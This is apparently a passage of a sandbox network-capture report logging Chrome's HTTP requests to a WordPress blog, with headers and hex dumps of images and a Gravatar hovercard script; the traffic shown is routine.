                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC1369INData Raw: 66 28 6e 65 77 20 68 28 5f 28 5f 28 7b 7d 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3a 7b 7d 29 2c 7b 7d 2c 7b 6d 79 48 61 73 68 3a 74 68 69 73 2e 6d 79 5f 68 61 73 68 2c 61 64 64 69 74 69 6f 6e 61 6c 43 6c 61 73 73 3a 22 77 70 2d 68 6f 76 65 72 63 61 72 64 22 2c 6f 6e 51 75 65 72 79 48 6f 76 65 72 63 61 72 64 52 65 66 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 72 3b 72 65 74 75 72 6e 20 74 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 77 70 2d 68 6f 76 65 72 63 61 72 64 2d 61 74 74 61 63 68 6d 65 6e 74 22 29 2c 74 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 67 72 61 76 2d 68 61 73 68 65 64 22 29 2c 22 41 22 21 3d 3d 28
                                                                                                                                                                                                                                                                  Data Ascii: f(new h(_(_({},arguments.length>2&&void 0!==arguments[2]?arguments[2]:{}),{},{myHash:this.my_hash,additionalClass:"wp-hovercard",onQueryHovercardRef:function(t){var r;return t.classList.add("wp-hovercard-attachment"),t.classList.add("grav-hashed"),"A"!==(


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  7192.168.2.1649713192.0.78.134437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC632OUTGET /wp-content/uploads/2024/09/pdf-image.png?w=204 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: fqr44.wordpress.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                  Referer: https://dartergary.wordpress.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC384INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:42 GMT
                                                                                                                                                                                                                                                                  Content-Type: image/webp
                                                                                                                                                                                                                                                                  Content-Length: 1366
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Last-Modified: Wed, 25 Sep 2024 10:42:57 GMT
                                                                                                                                                                                                                                                                  Expires: Mon, 28 Oct 2024 14:58:37 GMT
                                                                                                                                                                                                                                                                  X-Orig-Src: 0_imageresize
                                                                                                                                                                                                                                                                  Vary: Accept
                                                                                                                                                                                                                                                                  X-ac: 1.dfw _dfw HIT
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC985INData Raw: 52 49 46 46 4e 05 00 00 57 45 42 50 56 50 38 4c 41 05 00 00 2f cb c0 2f 00 9f c1 a0 91 24 45 7b fc 8c 22 de bf 31 c6 a5 9c 0d b7 91 24 29 52 1d 9f 44 fe 1b c9 f7 d2 4f 17 83 46 92 14 1d df 33 8a 78 ff c6 18 97 b2 f3 1f 59 ad 08 86 fc f9 11 e8 a9 07 4b 50 f0 e7 77 79 41 c0 5b 2f 81 9d 39 71 88 f9 39 f7 ff 66 17 8b 44 8f 8f cf cf 9f 1f 81 f2 a1 be fa 60 0b 74 17 91 c4 13 ac 59 29 e2 f5 f5 fb 13 18 81 50 c0 90 87 07 02 1e 5f 80 82 c7 82 32 e0 35 fa ae 53 35 b5 92 52 db b5 4a 0b c3 30 58 e6 c5 3c cc 40 d1 b6 ed 36 91 f4 e4 6c 8c 29 72 17 19 93 ee ed 52 e7 fe ff af 23 48 16 58 9a 3c 11 fd 9f 00 11 91 de 89 f0 4d 7e e8 eb 4f 4a 9c 2f cf 84 af e8 f7 c4 b5 74 05 0f bd a7 df 53 b7 54 0d af d1 ef 99 53 e9 89 7e a3 df 73 97 06 f0 d2 87 f4 cf c2 1d 75 a2 f7 e8 1f a5
                                                                                                                                                                                                                                                                  Data Ascii: RIFFNWEBPVP8LA//$E{"1$)RDOF3xYKPwyA[/9q9fD`tY)P_25S5RJ0X<@6l)rR#HX<M~OJ/tSTS~su
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC381INData Raw: 33 3a 78 44 43 38 17 9b d4 67 7f 98 d1 3d 8a e9 88 be a0 ea 33 e1 dc d6 68 8c db 9d 17 f5 0f 84 73 98 98 44 53 7b 2a 8e 6c c6 6a f0 a2 e2 c1 91 78 82 d2 24 5d d3 96 2a c6 23 ab 83 d5 6b 2a a6 24 dc 23 23 93 62 67 af 0f cb 24 5e 4f 3a d8 82 78 02 4c c4 b4 4f e7 1c 77 23 1b 2f 41 e2 29 52 13 35 c2 dd 8e 8a 8b d1 7a 47 10 e6 6e 8c 95 49 32 eb 9a 74 36 79 70 ba da 1f 4f 17 92 b0 e9 44 93 8a 69 d1 b0 63 0a 3c cc 9b b0 db 1e c9 42 4c 55 8d ee e1 c3 68 b1 2d 92 c7 52 8c d3 35 ee 77 87 ab ed 90 b8 ac 0b 31 2f 49 6f da 82 37 01 e0 30 af 13 31 8f a7 78 d0 77 d4 74 75 73 3d 9f 4e ea 5e 22 36 0b d2 9b 24 cd 6e a7 49 2c 76 a3 35 1e f5 9e f6 2b 30 1c d2 33 11 0e 0d 1e f7 bc 39 18 0e 53 12 a1 10 4f 48 84 42 3a 27 11 08 51 6f 09 22 0c 54 31 3e c3 a6 97 45 e5 64 07 06 41
                                                                                                                                                                                                                                                                  Data Ascii: 3:xDC8g=3hsDS{*ljx$]*#k*$##bg$^O:xLOw#/A)R5zGnI2t6ypODic<BLUh-R5w1/Io701xwtus=N^"6$nI,v5+039SOHB:'Qo"T1>EdA


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  8192.168.2.1649715192.0.77.324437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC622OUTGET /wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1610363240i HTTP/1.1
                                                                                                                                                                                                                                                                  Host: s2.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  Origin: https://dartergary.wordpress.com
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                  Referer: https://dartergary.wordpress.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC481INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:42 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/javascript
                                                                                                                                                                                                                                                                  Content-Length: 655
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  x-minify: t
                                                                                                                                                                                                                                                                  x-minify-cache: hit
                                                                                                                                                                                                                                                                  etag: W/1125-1684460931415.6394
                                                                                                                                                                                                                                                                  Expires: Fri, 30 May 2025 20:25:07 GMT
                                                                                                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                  X-ac: 4.dfw _dfw BYPASS
                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  X-nc: HIT dfw 1
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC655INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 77 69 6e 64 6f 77 2e 57 50 47 72 6f 48 6f 7c 7c 7b 7d 3b 65 2e 6d 79 5f 68 61 73 68 3d 22 22 3b 65 2e 64 61 74 61 3d 7b 7d 3b 65 2e 72 65 6e 64 65 72 65 72 73 3d 7b 7d 3b 65 2e 73 79 6e 63 50 72 6f 66 69 6c 65 44 61 74 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 72 29 7b 69 66 28 21 65 2e 64 61 74 61 5b 61 5d 29 7b 65 2e 64 61 74 61 5b 61 5d 3d 7b 7d 3b 76 61 72 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 64 69 76 2e 67 72 6f 66 69 6c 65 2d 68 61 73 68 2d 6d 61 70 2d 22 2b 61 2b 22 20 73 70 61 6e 22 29 3b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 6e 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 6f 3d 6e 5b 74 5d 3b 65 2e 64 61 74 61 5b 61 5d 5b 6f 2e 63 6c
                                                                                                                                                                                                                                                                  Data Ascii: (function(){var e=window.WPGroHo||{};e.my_hash="";e.data={};e.renderers={};e.syncProfileData=function(a,r){if(!e.data[a]){e.data[a]={};var n=document.querySelectorAll("div.grofile-hash-map-"+a+" span");for(var t=0;t<n.length;t++){var o=n[t];e.data[a][o.cl


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  9192.168.2.1649716192.0.78.134437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC389OUTGET /wp-content/uploads/2024/09/pdf-image.png?w=204 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: fqr44.wordpress.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC383INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:43 GMT
                                                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                                                  Content-Length: 1741
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Last-Modified: Wed, 25 Sep 2024 10:42:57 GMT
                                                                                                                                                                                                                                                                  Expires: Mon, 28 Oct 2024 09:43:20 GMT
                                                                                                                                                                                                                                                                  X-Orig-Src: 0_imageresize
                                                                                                                                                                                                                                                                  Vary: Accept
                                                                                                                                                                                                                                                                  X-ac: 5.dfw _dfw HIT
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC986INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 cc 00 00 00 c0 08 03 00 00 00 7f 3e 7c bb 00 00 00 9c 50 4c 54 45 e2 00 01 ff ff ff c6 00 01 e2 00 00 e3 1d 1d f2 ac ac e6 45 45 fd e9 e9 f5 bd bd e4 33 33 ff fc fc d5 00 01 e6 48 48 ff f7 f7 ee 95 95 d2 00 01 f6 ca ca f2 a8 a8 ee 8c 8c e4 2f 2f ec 7b 7b f0 9a 9a f9 d9 d9 fa de de e8 5a 5a e8 56 56 e3 0b 0b fd ef ef e4 29 29 e3 12 12 ed 86 86 e3 22 22 f8 d2 d2 e8 50 50 eb 72 72 f5 b6 b6 e0 8a 8b d5 5a 5a e9 6a 6a e9 64 64 e5 3b 3b d8 63 63 d1 48 48 cc 38 38 ca 22 23 e4 96 97 de 82 82 d9 6f 6f cd 2f 30 c9 0f 0f d7 53 53 ca 19 1a 57 18 18 5d 00 00 05 ec 49 44 41 54 78 da ed dd db 76 a2 30 14 06 e0 9d 6c 15 cc 14 07 05 44 45 14 a5 15 3b 9d f3 bc ff bb cd b2 73 a8 06 82 89 5a 49 b2 f2 df 76 41 fd 4c c0
                                                                                                                                                                                                                                                                  Data Ascii: PNGIHDR>|PLTEEE33HH//{{ZZVV))""PPrrZZjjdd;;ccHH88"#oo/0SSW]IDATxv0lDE;sZIvAL
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC755INData Raw: c2 df 3f c2 7d c7 18 be 24 9c e6 92 98 86 db af b7 ed b4 9b 01 00 77 25 a7 91 2c 06 60 cf 77 b4 d1 bf 7e d6 15 86 eb 2c e9 5e 1e 03 fc d7 2e f4 7b 1d 63 56 1c 66 20 8f c1 21 87 29 1e 0c c6 00 77 f7 48 2b d0 ab 9b 0d 15 ba 19 4c b8 22 2d 36 f7 06 00 b0 e1 0b a2 8e bb 19 37 a0 29 16 0a 18 44 7e 9c fa 77 74 22 3f 9c b9 e9 e7 cc 03 d7 ed 7d 04 05 0c 70 9f 9b e3 9e 00 d3 c7 a6 79 e6 75 ae 36 6f 7e 6e 38 c3 f5 32 d6 07 25 0c 57 0d 94 4b 54 aa 67 c6 37 c4 20 ce f8 81 e6 4e 0d c3 bd e6 32 52 c3 24 37 c3 20 e2 a6 10 15 7e 92 98 b2 63 cc db a5 d7 8b 6b 35 63 08 6a 2d c3 8d 01 fc 61 27 98 f5 be 4a fc 7a bd 58 5d 87 b9 73 cb 64 61 11 1e 52 4c bd 86 6f 19 4a 01 c1 a0 6e d6 9e 0a c0 a4 1b 40 6b 0a 40 b8 eb ad f9 3d 31 11 aa b6 0c 77 d5 25 b9 36 98 1d aa 62 64 87 33 77
                                                                                                                                                                                                                                                                  Data Ascii: ?}$w%,`w~,^.{cVf !)wH+L"-67)D~wt"?}pyu6o~n82%WKTg7 N2R$7 ~ck5cj-a'JzX]sdaRLoJn@k@=1w%6bd3w


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  10192.168.2.1649718192.0.77.324437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC604OUTGET /i/logo/wpcom-gray-white.png HTTP/1.1
                                                                                                                                                                                                                                                                  Host: s2.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                  Referer: https://dartergary.wordpress.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC468INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:43 GMT
                                                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                                                  Content-Length: 8203
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Last-Modified: Fri, 19 May 2023 02:58:44 GMT
                                                                                                                                                                                                                                                                  ETag: "6466e5e4-200b"
                                                                                                                                                                                                                                                                  Expires: Fri, 24 Jan 2025 04:41:09 GMT
                                                                                                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                  X-ac: 4.dfw _dfw MISS
                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  X-nc: HIT dfw 2
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC901INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 f4 00 00 01 f4 08 03 00 00 00 fc 08 2f b8 00 00 00 72 50 4c 54 45 de de de dd dd dd dc dc dc df df df e1 e1 e1 e3 e3 e3 e7 e7 e7 e8 e8 e8 ea ea ea ee ee ee ef ef ef eb eb eb e4 e4 e4 e2 e2 e2 e6 e6 e6 f1 f1 f1 f4 f4 f4 f6 f6 f6 fa fa fa fb fb fb fd fd fd ff ff ff fe fe fe f7 f7 f7 f5 f5 f5 e0 e0 e0 ec ec ec f2 f2 f2 ed ed ed e9 e9 e9 f8 f8 f8 fc fc fc f9 f9 f9 f3 f3 f3 f0 f0 f0 e5 e5 e5 db db db da da da 72 1c ce 58 00 00 1f 54 49 44 41 54 78 da ec da d9 96 aa 48 10 05 d0 8c 20 11 29 44 64 88 04 65 54 ff ff 1f ef bd 56 f7 ea 55 dd 2d 24 8e 08 67 3f eb 83 eb 18 91 53 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: PNGIHDR/rPLTErXTIDATxH )DdeTVU-$g?S(
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 14 fb ff e2 73 27 16 b2 d3 84 26 d2 88 75 d5 da 6d e3 91 fa 7f 11 59 9d cd db 4a 33 4d 6c 1b b2 4e c4 42 e4 a0 c5 ff 0b eb d8 2a f2 29 de 76 b0 b2 8a bd db a0 d8 7f e0 55 6a 1f f9 a7 c6 9e 05 a8 f5 7f 10 f9 32 28 f3 1d 56 93 c5 2a 48 65 50 89 16 ff 37 da 17 32 e8 a4 79 ea 37 89 16 4f c1 1d ee e7 be f1 26 b1 19 4a a0 4f 18 fa 90 21 99 87 d4 7f e3 da c8 80 6e c5 a4 3e 00 d9 bc 08 fb 78 6f 25 fa 92 01 ed 41 d1 9c 66 3f 76 4b 5f d8 c9 d9 c9 80 52 f3 67 3d 12 fa 46 fa 35 cb 5e d8 39 6c a4 5f f7 79 d3 27 1c 16 d2 2f 3d f3 92 2f 5e 53 e9 65 2a 45 9f b8 64 d5 43 bf ab e6 c5 66 ee 19 e9 15 bb fc a9 2f c4 a5 f4 3b d0 42 33 0f 06 2f b0 e8 83 ff d0 a9 f4 3a f1 12 63 1f da b6 c7 21 ab 8b 99 16 fb 51 d1 f2 32 8f 06 56 73 22 f5 d9 86 06 bf 8a a5 1d dd 48 ed e6 ff 22 c5
                                                                                                                                                                                                                                                                  Data Ascii: s'&umYJ3MlNB*)vUj2(V*HeP72y7O&JO!n>xo%Af?vK_Rg=F5^9l_y'/=/^Se*EdCf/;B3/:c!Q2Vs"H"
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: bf b5 71 d0 d1 d4 49 ff 7d 7d ec df 10 5b 47 af d5 44 4c 77 9b 72 cd 98 78 bc 26 8a d4 1a 15 32 7b a5 0c 3c e2 72 cb 6c eb 7a d5 5b 67 5b f7 70 e5 2a 2f 79 a5 1e c9 19 9e b2 6d 95 49 ad 71 ba 77 fd 75 cd e5 d3 87 43 fd 6a a7 d1 9b c2 ae 5a 22 e2 8a 85 ef f0 56 11 2f f8 27 f8 f8 65 b0 d1 ea 14 6d 57 4d e3 0d 26 6a 70 22 2f 24 7c 38 2f bd 91 b0 50 b5 52 96 f1 fd c1 c3 77 78 fd aa fe 9c 8f ef bb 6f 9c 4e cc 0c 62 1b a1 e9 79 ba cd a9 5d f9 ca 0f 0c cd 14 dc 8b 74 13 f0 de 53 0d c1 e7 c0 1f 48 50 b4 5b d4 c6 e3 bd 7c e5 f4 45 01 0f df 05 9d d6 18 7d ee a5 49 f0 12 0b 1c 4a e6 fa 82 cc b9 aa 5a dd aa a5 aa 74 60 5f c4 6a fe 2b 4f 25 33 df 8f 0c 7c 5f 59 61 bd d0 1c 37 7b 0f 2f d0 03 5b e3 ca cb 77 9c 99 f8 2e 68 5c 63 74 41 a9 ed bb 87 ce df e4 7f 22 ee fa 71
                                                                                                                                                                                                                                                                  Data Ascii: qI}}[GDLwrx&2{<rlz[g[p*/ymIqwuCjZ"V/'emWM&jp"/$|8/PRwxoNby]tSHP[|E}IJZt`_j+O%3|_Ya7{/[w.h\ctA"q
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: de b2 f1 9d 52 0d df 5d b3 a2 1e 58 64 f4 90 34 18 c7 cb 77 bf e2 e2 3b dd 8c 9a 6e e1 5b 64 f4 c4 28 27 8c 90 99 ef c8 b8 76 3d a2 48 83 ee 9a 46 bf 91 3d cd 52 13 34 a2 55 66 be 47 2c 55 fd e5 d2 72 fb 6c 71 b2 b5 c8 e8 3e f4 67 36 73 be 73 1c 6f 3e 7e a5 d1 2b 1f 3a c3 84 df e8 f4 30 33 3a 26 06 be 1b 7a 15 e6 9b 3a 69 18 5d 3b ab 2a 7b 6b 2a 2e d4 9a 86 8f 03 73 7d 35 61 e0 fb b2 d1 23 7a 36 21 32 da 63 f4 42 6a 7d 91 39 ff fe 50 3c 7c a7 93 19 45 50 5b 6d f4 5e ea c5 7a ac 7c a7 8b e2 e1 3b 45 b3 f1 a0 db 46 37 0f 9a 2e 5c e7 f3 e9 f3 dd b4 da 34 c1 7d a3 53 c4 c9 f7 77 ba f3 f0 9d d2 d9 33 82 1c 37 ba 79 2a f6 46 9b b5 01 30 f0 7d 21 f7 de 92 eb 46 37 0f 9a 32 6c 16 a6 f3 f0 1d d7 85 e6 38 f7 8d 1e 28 03 55 31 36 a2 3b 13 df 91 cd bf cc ee 1b 5d c8
                                                                                                                                                                                                                                                                  Data Ascii: R]Xd4w;n[d('v=HF=R4UfG,Urlq>g6sso>~+:03:&z:i];*{k*.s}5a#z6!2cBj}9P<|EP[m^z|;EF7.\4}Sw37y*F0}!F72l8(U16;]
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 00 a0 18 79 51 87 39 b4 3f 69 6a 88 76 df 18 68 8b 41 f9 ae ce 95 db 5c 6b b0 76 46 c8 d4 41 d2 c6 93 a6 4e 6f 93 e8 bc d0 80 8f 17 f9 33 03 0d b5 a5 40 c2 36 51 96 8e 8c 42 7e 7c da d6 88 ef 6f 6b f7 4c 40 55 70 7f a6 f2 2c c9 76 07 f9 70 84 6b d4 c9 b1 1b 9e 34 e5 ef 2f 1b 1b 03 1d 8a 29 df b5 f4 95 88 e7 11 8c 77 b0 5d 0c 7e 9a 27 69 ea f4 26 dd eb 85 80 aa a0 fa dd b6 00 0e 2f 82 00 ac 0e a3 87 9e 41 20 a4 8e f3 7d 38 dd 9f 36 1c a6 7e fd ae d2 b3 f0 59 0b 36 17 23 34 a4 60 7c e7 56 6c 3e 80 ee 43 6b d3 b4 46 7c 1f f0 df 29 02 1b 24 63 62 6c af 72 be a7 98 ef c3 e9 7e 0d dc a1 b8 1a 20 4e 29 dd f7 c0 90 9a 2c 54 52 df c8 5f bf d2 1a a0 7b 48 55 b1 d3 5b ea 3b 03 da 3d 42 2b 31 ea a6 2d 35 85 15 9b 03 ba 07 55 15 a9 bd 95 90 3c ec ed 74 06 54 bc 47 30
                                                                                                                                                                                                                                                                  Data Ascii: yQ9?ijvhA\kvFANo3@6QB~|okL@Up,vpk4/)w]~'i&/A }86~Y6#4`|Vl>CkF|)$cblr~ N),TR_{HU[;=B+1-5U<tTG0
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 26 df 41 7d cc 9b 8d 58 bf 52 42 42 fa 6b b1 a1 86 b1 35 68 7a 3b e3 e8 9b 27 7b 0b 9f 34 01 29 04 54 05 79 00 b2 51 11 1f ee fc 95 f5 4c d4 d3 42 c1 ad d8 71 72 1e 7b 8e fc 00 4a aa ff 17 dc 39 1d 8b 0f 8d 92 34 f1 95 c4 af 2a d8 66 b8 9e 11 e0 1e 47 c1 7f df 45 92 26 7e 57 de 04 56 2c 2a 12 b3 f4 1b c0 7d ee 80 3f 51 7d c3 eb 57 38 dd c3 ab 8a 52 0c 24 97 39 b5 9d e0 78 a4 45 c1 45 04 ba 03 2b 16 d1 5d bb 33 98 13 d1 83 cf 94 cb ce c2 d6 af 80 d6 85 a3 ab 8a 7a 21 c0 c1 d9 7b ee fc a5 9d be 14 2e 69 a2 36 50 f8 b6 18 c3 4b 9f 75 ad c0 b7 32 9b 60 08 ab ae 0a 5c bf c2 37 26 f9 65 71 fc 01 94 d1 a5 2f 7e 70 57 eb 28 01 55 80 e9 ce ad 58 1a f5 55 c0 02 98 75 b6 e6 af 70 cc c6 4d 9a 32 0b e4 26 73 ba 93 23 9a c5 c7 9c c3 df 22 ec 60 40 0a 62 b8 72 5f 11 c6
                                                                                                                                                                                                                                                                  Data Ascii: &A}XRBBk5hz;'{4)TyQLBqr{J94*fGE&~WV,*}?Q}W8R$9xEE+]3z!{.i6PKu2`\7&eq/~pW(UXUupM2&s#"`@br_
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC457INData Raw: 66 52 51 5c 27 65 2f 4e 0a 6c d3 1e c5 ba ce c5 59 5e 5e c2 76 8a 2a f5 19 3e d1 6f a3 26 62 66 a5 bd d3 ae 4e ce 99 11 57 c5 01 f7 6f 4f 89 bd e9 e5 21 26 1f d2 4b 73 0c 76 be ef 69 ad e9 0b a5 75 e5 fb 71 b0 6f 92 b1 cb 3f 2f df 88 fc fb 71 55 e7 f2 0c c6 f4 79 9e 9d bf 18 f2 bc 37 46 3e 21 f2 77 29 f2 b7 21 f2 57 8d bd 1d e4 85 e5 35 1e a6 2d 80 d5 ee 2c 2f aa db e3 8e 7d 21 44 a7 a4 90 97 63 d2 98 10 f9 72 88 bd ba 93 97 92 85 11 9e 98 2f 8c 98 e2 4b 21 2f c2 a4 3b 85 c8 d7 5a ee a5 bc 80 21 8c 18 75 7d 35 4c d3 21 93 6f d5 27 31 16 f9 ca 88 75 9c 64 df 96 f8 18 54 48 fc db 72 cf 91 f8 16 73 3f 74 46 d6 93 25 bb 0a 17 f2 ef 46 4c fe 31 cd 65 05 fd b9 39 e1 3a fe 3a b9 57 f1 a1 2c 64 41 a6 bb 06 1e 21 f1 97 42 ac bc 5d 78 5e 24 f8 a2 bb b6 11 96 f8 eb
